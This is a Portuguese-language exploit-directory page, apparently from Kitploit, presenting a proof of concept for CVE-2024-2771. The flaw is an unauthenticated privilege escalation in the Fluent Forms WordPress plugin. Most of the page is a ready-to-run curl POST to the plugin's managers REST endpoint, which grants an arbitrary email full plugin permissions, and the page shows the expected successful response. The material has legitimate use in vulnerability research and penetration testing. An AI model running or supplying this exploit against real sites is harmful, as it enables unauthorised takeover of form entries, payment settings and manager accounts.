Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2771-PoC — Exploit de prova de conceito para CVE-2024-2771, uma vulnerabilidade de escalonamento de privilégios no plugin Fluent Forms do WordPress por meio de um endpoint de API REST não autenticado. | Kitploit
Ferramentas/GitHubGitHub/whale93/cve-2024-2771-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubwhale93/cve-2024-2771-poc

CVE-2024-2771-PoC

Exploit de prova de conceito para CVE-2024-2771, uma vulnerabilidade de escalonamento de privilégios no plugin Fluent Forms do WordPress por meio de um endpoint de API REST não autenticado.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2771-PoC

Prova de conceito do CVE-2024-2771

O plugin Contact Form by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder para WordPress é vulnerável a escalonamento de privilégios devido à ausência de verificação de capacidade no endpoint da REST API /wp-json/fluentform/v1/managers em todas as versões até, e incluindo, a 5.1.16. Isso possibilita que atacantes não autenticados concedam a usuários permissões de gerenciamento do Fluent Form, o que lhes dá acesso a todas as configurações e recursos do plugin. Isso também possibilita que atacantes não autenticados excluam contas de gerentes.

Pré-requisitos

  • Site WordPress com Contact Form – Fluent Forms ≤ 5.1.16 ativo.
  • O atacante consegue acessar a REST API do site (nenhuma autenticação necessária).

Comando do Exploit

root@kitploit:~
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
     -H "Content-Type: application/json" \
     -d '{
           "manager": {
             "email": "[email protected]",
             "permissions": [
               "fluentform_dashboard_access",
               "fluentform_forms_manager",
               "fluentform_entries_viewer",
               "fluentform_manage_entries",
               "fluentform_view_payments",
               "fluentform_manage_payments",
               "fluentform_settings_manager",
               "fluentform_full_access"
             ]
           }
         }'

Resposta Esperada

root@kitploit:~
HTTP/1.1 200 OK
{
  "message": "Manager has been saved.",
  "manager": {
    "id": 2,
    "email": "[email protected]",
    "permissions": [
      "fluentform_dashboard_access",
      "fluentform_forms_manager",
      "fluentform_entries_viewer",
      "fluentform_manage_entries",
      "fluentform_view_payments",
      "fluentform_manage_payments",
      "fluentform_settings_manager",
      "fluentform_full_access"
    ]
  }
}

Captura de Tela Screenshot 2025-08-01 105801

Baixar ferramenta